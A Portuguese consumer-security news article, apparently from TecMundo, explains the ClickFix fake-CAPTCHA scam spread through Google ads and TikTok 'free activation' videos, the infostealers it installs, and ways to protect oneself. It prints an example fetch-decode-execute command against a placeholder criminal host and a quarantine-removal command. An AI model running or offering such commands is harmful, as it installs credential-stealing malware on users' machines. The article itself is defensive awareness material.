Golpe que rouba tudo do seu PC se esconde no ‘Netflix Premium’ e Google

Uma técnica sofisticada chamada ClickFix vem causando prejuízos milionários globalmente e já afetou grandes organizações, incluindo hospitais e universidades nos Estados Unidos. O golpe engana vítimas para que elas mesmas executem comandos maliciosos em seus computadores, instalando programas que roubam senhas, dados bancários e carteiras de criptomoedas.

O ClickFix (também conhecido como FileFix ou fake CAPTCHA) é utilizado regularmente pelo grupo de ransomware Interlock e outros atores de ameaças prolíficos, incluindo APTs patrocinados por Estados. 

Violações públicas de dados foram vinculadas às táticas do ClickFix, como os casos da Kettering Health, DaVita, City of St. Paul (Minnesota) e Texas Tech University Health Sciences Centers, com muitas outras violações provavelmente envolvendo a técnica quando o vetor de ataque não foi conhecido ou divulgado.

Diferente dos golpes tradicionais de phishing por email, o ClickFix explora uma falha no comportamento humano: a confiança em instruções aparentemente legítimas. A técnica está sendo disseminada principalmente através de anúncios pagos no Google e vídeos no TikTok, atingindo tanto desenvolvedores experientes quanto usuários comuns em busca de software “crackeado”.

O que é o golpe ClickFix e como funciona?

O ClickFix é um ataque onde usuários interagem com scripts maliciosos em navegadores web. Os ataques apresentam ao usuário algum tipo de problema ou desafio no navegador — mais comumente um CAPTCHA, mas também situações como corrigir um erro em uma página web. Apesar do nome, o fator-chave do ataque não está no clique em si.

O golpe funciona em quatro etapas críticas:

1. A vítima encontra um site falso através de anúncios no Google, vídeos do TikTok ou resultados de busca envenenados. Esses sites imitam plataformas populares ou oferecem ativações gratuitas de software pago.
2. O site exibe algo que parece legítimo — pode ser um falso CAPTCHA, uma mensagem de erro ou instruções de instalação. Aparecem botões como “Copiar comando”, “Verificar” ou “Corrigir erro”.
3. Quando a vítima clica no botão, um código JavaScript oculto copia automaticamente um comando malicioso para a área de transferência. A ação de cópia maliciosa do clipboard é executada nos bastidores via JavaScript em 99% das vezes. O comando geralmente está codificado em Base64 para que a vítima não consiga ler seu verdadeiro conteúdo.
4. O site instrui o usuário a abrir o Terminal (Mac) ou PowerShell (Windows) como administrador e colar o comando. Quando a vítima cola e pressiona Enter, o comando baixa e executa um script que instala malware ladrão de informações.

Um exemplo de comando malicioso para Mac seria: curl -fsSL [site-controlado-por-criminosos]/install.sh | base64 -d | bash

Este comando usa o curl para baixar um arquivo de um servidor controlado pelos criminosos, base64 -d para decodificar o conteúdo escondido, e bash para executar o script automaticamente. O script também pode executar comandos como xattr -d com.apple.quarantine para desativar as proteções de segurança do macOS.

Por que o ClickFix é tão eficaz?

Por mais de uma década, a conscientização do usuário focou em impedir que pessoas cliquem em links em emails suspeitos, baixem arquivos arriscados e insiram nome de usuário e senha em sites aleatórios. Não focou em abrir um programa e executar um comando. Essa lacuna no treinamento de segurança cria uma janela de oportunidade para os criminosos.

A suspeita é ainda mais reduzida quando se considera que a ação de cópia maliciosa do clipboard é executada nos bastidores via JavaScript. E com sites e iscas ClickFix modernos se tornando cada vez mais legítimos, não é surpreendente que usuários estejam caindo nas armadilhas.

Outro fator crítico é a dificuldade de detecção. Como o código é copiado dentro do sandbox do navegador, ferramentas de segurança típicas não conseguem observar e sinalizar essa ação como potencialmente maliciosa. Isso significa que a última — e única — oportunidade para organizações pararem o ClickFix é no endpoint, depois que o usuário tentou executar o código malicioso.

Como não há download de arquivo da web, e o ato de executar código na máquina é iniciado pelo usuário, não há contexto vinculando a ação a outro aplicativo para fazê-la parecer suspeita. Por exemplo, PowerShell malicioso executado pelo Outlook ou Chrome pareceria obviamente suspeito, mas como é iniciado pelo usuário, está isolado do contexto de onde o código foi entregue.

Anúncios falsos no Google distribuem malware para desenvolvedores Mac

Criminosos criaram mais de 85 domínios falsos imitando Homebrew, LogMeIn e TradingView, usando anúncios pagos no Google Ads para aparecer nos primeiros resultados de busca. A campanha mira especificamente desenvolvedores de Mac, um público que normalmente tem maior consciência de segurança.

O Homebrew é um gerenciador de pacotes extremamente popular entre desenvolvedores Mac, usado para instalar ferramentas de linha de comando e aplicativos. Os criminosos exploram essa popularidade criando domínios que parecem legítimos à primeira vista.

Quando desenvolvedores buscam por “Homebrew” no Google, os anúncios maliciosos aparecem acima dos resultados orgânicos legítimos. Os sites falsos são visualmente idênticos ao site oficial, com instruções de instalação que parecem profissionais.

As campanhas distribuem principalmente o AMOS (Atomic macOS Stealer), vendido como serviço por $1.000 por mês, que rouba mais de 50 extensões de carteiras de criptomoedas, dados de navegadores e senhas do Keychain do Mac. Também distribuem o Odyssey Stealer, uma variante fork do AMOS com funcionalidades similares.

Esses infostealers (ladrões de informações) são especialmente perigosos porque roubam:

• Senhas salvas em navegadores;
• Cookies de sessão (que permitem acesso sem senha);
• Informações de carteiras de criptomoedas;
• Dados bancários e de cartões;
• Arquivos pessoais e profissionais.

O único site oficial do Homebrew é https://brew.sh — qualquer outro domínio é falso. Variações como “brewe.sh”, “homebrewonline.org” ou “homebrew-install.com” são todos domínios maliciosos criados para enganar desenvolvedores.

Como identificar anúncios falsos no Google

Os anúncios maliciosos são difíceis de identificar porque podem aparecer marcados como “Patrocinado” no topo dos resultados, usam logotipos e design idênticos aos sites legítimos, podem apresentar URLs que parecem oficiais à primeira vista e porque criminosos investem em Google Ads para garantir bom posicionamento nas páginas de busca.

A malvertising (publicidade maliciosa) adiciona outra camada de direcionamento. Por exemplo, anúncios do Google podem ser direcionados a buscas vindas de localizações geográficas específicas, adaptados a correspondências de domínio de e-mail específicas, ou tipos de dispositivos específicos (como desktop, mobile, etc.). Se você sabe onde seu alvo está localizado, pode adaptar os parâmetros do anúncio adequadamente.

Vídeos no TikTok prometem ativação grátis e instalam vírus

Criminosos publicam vídeos no TikTok disfarçados de tutoriais para ativar gratuitamente Windows, Office, Adobe, CapCut, Discord Nitro e até serviços inexistentes como “Netflix Premium” e “Spotify Premium”. A tática explora o desejo de usuários por software gratuito, principalmente entre um público mais jovem.

Os vídeos são produzidos de forma profissional, muitas vezes com narrações em português e edições caprichadas. O conteúdo é apresentado por vídeos tutoriais falsos, muitas vezes produzidos com ajuda de inteligência artificial, e compartilhado por perfis que já foram removidos da plataforma.

O padrão de ataque no TikTok segue uma fórmula específica:

1. O vídeo promete ativação gratuita de software caro ou serviços premium pagos;
2. Nas instruções, direciona para um site externo (geralmente encurtado para parecer menos suspeito);
3. O site apresenta um falso CAPTCHA ou instruções de “verificação”;
4. A vítima é instruída a copiar e colar comandos no terminal ou PowerShell;
5. O malware é instalado silenciosamente, começando a roubar informações.

Ao seguir os passos, a vítima instala sem perceber programas espiões que roubam senhas, dados bancários e outras informações sensíveis. O processo inteiro parece uma instalação normal, sem alertas óbvios de segurança.

Um ponto crítico: não existe ativação gratuita legítima para Netflix Premium, Spotify Premium ou Adobe Creative Cloud. Qualquer promessa nesse sentido é, inevitavelmente, um golpe.

O perigo dos “cracks” e ativadores

Usuários que buscam versões “crackeadas” de software se colocam em risco extremo. Os motivos incluem:

• Vulnerabilidade intencional: quem busca pirataria já está disposto a baixar e executar arquivos não confiáveis;
• Sem verificação: sites de pirataria não têm mecanismos de segurança ou reputação a zelar;
• Alvos fáceis: criminosos sabem que essas pessoas executarão comandos sem questionar;
• Jovens desprotegidos: o público mais jovem do TikTok tem menos experiência com segurança digital.

Quando você considera o fato de que esses ataques estão se afastando completamente do e-mail, não se encaixa no modelo do que os usuários são treinados para desconfiar. O principal vetor de entrega identificado por pesquisadores da Push Security foi encontrado como envenenamento de SEO e malvertising via Google Search.

Como se proteger do golpe ClickFix

A proteção contra ClickFix exige uma mudança de mentalidade sobre o que constitui uma ameaça.

• Nunca execute comandos de fontes não verificadas. Se um site, vídeo ou tutorial pedir para você abrir o Terminal/PowerShell e colar comandos, pare imediatamente. Não há razão legítima para instalação de software requerer esse processo;
• Digite URLs manualmente. Nunca clique em anúncios do Google para acessar sites de ferramentas conhecidas. Digite a URL diretamente no navegador ou use favoritos salvos;
• Desconfie de CAPTCHAs estranhos. Se um CAPTCHA pedir para você copiar comandos ou abrir programas do sistema, é 100% malicioso. CAPTCHAs legítimos apenas pedem para clicar em imagens ou digitar caracteres;
• Verifique domínios cuidadosamente. Antes de seguir instruções de instalação, confira se o domínio é oficial. Para Homebrew, apenas https://brew.sh é legítimo. Qualquer variação é falsa;
• Não existe software premium grátis. Netflix, Spotify, Adobe e outros serviços não oferecem ativações gratuitas. Promessas nesse sentido são sempre golpes;
• Use gerenciadores de pacotes oficiais. No Mac, instale o Homebrew apenas do site oficial. No Windows, use a Microsoft Store ou o gerenciador oficial winget;
• Mantenha software de segurança ativo. Embora o EDR (Endpoint Detection and Response) seja a última e única linha de defesa contra ClickFix, ter proteção no endpoint pode bloquear a execução do malware mesmo após a instalação;
• Eduque-se sobre engenharia social. O ClickFix é conhecido por ser regularmente usado pelo grupo de ransomware Interlock e outros atores de ameaças prolíficos, incluindo APTs patrocinados por Estados. Entender as táticas usadas ajuda a reconhecê-las.

Quer saber mais sobre golpes desse tipo? Acompanhe o TecMundo nas redes sociais. Inscreva-se na nossa newsletter e em nosso canal do YouTube para mais notícias de tecnologia e segurança.